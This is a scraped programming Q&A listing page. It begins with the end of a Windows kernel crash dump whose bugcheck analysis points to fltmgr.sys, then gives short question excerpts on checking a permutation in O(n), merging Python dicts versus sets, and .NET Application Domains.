00:59:19 2007 (45D699B7) f76b7000 f76c6000 raspppoe Sat Feb 17 00:59:23 2007 (45D699BB) f76c8000 f7707000 NDIS Sat Feb 17 01:28:49 2007 (45D6A0A1) f7707000 f770f000 kdcom Tue Mar 25 03:08:00 2003 (3E800050) f770f000 f7717000 BOOTVID Tue Mar 25 03:07:58 2003 (3E80004E) f7717000 f771e000 intelide Sat Feb 17 01:07:32 2007 (45D69BA4) f771f000 f7726000 dmload Tue Mar 25 03:08:08 2003 (3E800058) f777f000 f7786000 dxgthk Tue Mar 25 03:05:52 2003 (3E7FFFD0) f7787000 f778e000 vmmemctl Tue Aug 12 20:37:25 2008 (48A22CC5) f77cf000 f77d6280 vmxnet Mon Sep 08 21:17:10 2008 (48C5CE96) f77d7000 f77df000 audstub Tue Mar 25 03:09:12 2003 (3E800098) f77ef000 f77f7000 Fs_Rec Tue Mar 25 03:08:36 2003 (3E800074) f77f7000 f77fe000 Null Tue Mar 25 03:03:05 2003 (3E7FFF29) f77ff000 f7806000 Beep Tue Mar 25 03:03:04 2003 (3E7FFF28) f7807000 f780f000 mnmdd Tue Mar 25 03:07:53 2003 (3E800049) f780f000 f7817000 RDPCDD Tue Mar 25 03:03:05 2003 (3E7FFF29) f7817000 f781f000 rasacd Tue Mar 25 03:11:50 2003 (3E800136) f7878000 f7897000 Mup Tue Apr 12 15:05:46 2011 (4DA4A28A) f7897000 f7899980 compbatt Sat Feb 17 00:58:51 2007 (45D6999B) f789b000 f789e900 BATTC Sat Feb 17 00:58:46 2007 (45D69996) f789f000 f78a1b00 vmscsi Wed Apr 11 13:55:32 2007 (461D2114) f79af000 f79b0280 vmmouse Mon Aug 11 07:16:51 2008 (48A01FA3) f79b1000 f79b2280 swenum Sat Feb 17 01:05:56 2007 (45D69B44) f7b4a000 f7bdf000 Ntfs Sat Feb 17 01:27:23 2007 (45D6A04B) Unloaded modules: ba65a000 ba668000 imapi.sys Timestamp: unavailable (00000000) Checksum: 00000000 ImageSize: 0000E000 ba1c4000 ba1d5000 vpc-8042.sys Timestamp: unavailable (00000000) Checksum: 00000000 ImageSize: 00011000 f77df000 f77e7000 Sfloppy.SYS Timestamp: unavailable (00000000) Checksum: 00000000 ImageSize: 00008000 ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* Use !analyze -v to get detailed debugging information. BugCheck 7E, {c0000005, f723e087, f78dea8c, f78de788} ***** Kernel symbols are WRONG. Please fix symbols to do analysis. --omitted-- Probably caused by : fltmgr.sys ( fltmgr!FltGetIrpName+63f ) Followup: MachineOwner --------- Finished dump check

    Read the article

  • Algorithm: How to tell if an array is a permutation in O(n)?

    - by Iulian Serbanoiu
    Hello, Input: A read-only array of N elements containing integer values from 1 to N. And a memory zone of a fixed size (10, 100, 1000 etc - not depending on N). How to tell in O(n) if the array represents a permutation? --What I achieved so far:-- I use the limited memory area to store the sum and the product of the array. I compare the sum with N*(N+1)/2 and the product with N! I know that if condition (2) is true I might have a permutation. I'm wondering if there's a way to prove that condition (2) is sufficient to tell if I have a permutation. So far I haven't figured this out ... Thanks, Iulian

    Read the article

  • what's faster: merging lists or dicts in python?

    - by tipu
    I'm working with an app that is cpu-bound more than memory bound, and I'm trying to merge two things whether they be sets or dicts. Now the thing is i can choose either one, but I'm wondering if merging dicts would be faster since it's all in memory? Or is it always going to be O(n), n being the size of the smaller set. The reason I asked about dicts rather than sets is because I can't convert a set to json, because that results in {key1, key2, key3} and json needs a key/value pair, so I am using a dict so json dumps returns {key1:1, key2:1, key3:1}. Yes this is wasteful, but if it proves to be faster then I'm okay with it.

    Read the article

  • I don't understand Application Domains

    - by Jeremy Edwards
    .NET has this concept of Application Domains which from what I understand can be used to load an assembly into memory. I've done some research on Application Domains as well as go to my local book store for some additional knowledge on this subject matter but it seems very scarce. All I know that I can do with Application Domains is to load assemblies in memory and I can unload them when I want. What are the capabilities other that I have mentioned of Application Domains? Do Threads respect Application Domains boundaries? Are there any drawbacks from loading Assemblies in different Application Domains other than the main Application Domains beyond performance of communication? Links to resources that discuss Application Domains would be nice as well. I've already checked out MSDN which doesn't have that much information about them.

    Read the article

< Previous Page | 208 209 210 211 212 213 214 215 216 217 218 219  | Next Page >